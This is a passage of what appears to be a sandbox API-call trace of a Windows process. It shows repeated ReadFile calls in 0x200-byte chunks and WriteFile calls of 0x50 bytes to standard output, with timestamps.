hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.718] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.718] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] GetFileType (hFile=0x50) returned 0x1 [0207.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.718] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.719] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.719] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] GetFileType (hFile=0x50) returned 0x1 [0207.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.719] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.720] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.720] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.720] GetFileType (hFile=0x50) returned 0x1 [0207.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] GetFileType (hFile=0x50) returned 0x1 [0207.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.721] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.721] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.721] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.722] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] GetFileType (hFile=0x50) returned 0x1 [0207.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.722] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.723] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.723] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] GetFileType (hFile=0x50) returned 0x1 [0207.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.723] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.724] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.724] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] GetFileType (hFile=0x50) returned 0x1 [0207.724] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.724] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.725] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.725] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] GetFileType (hFile=0x50) returned 0x1 [0207.725] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.725] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] GetFileType (hFile=0x50) returned 0x1 [0207.726] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.726] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, 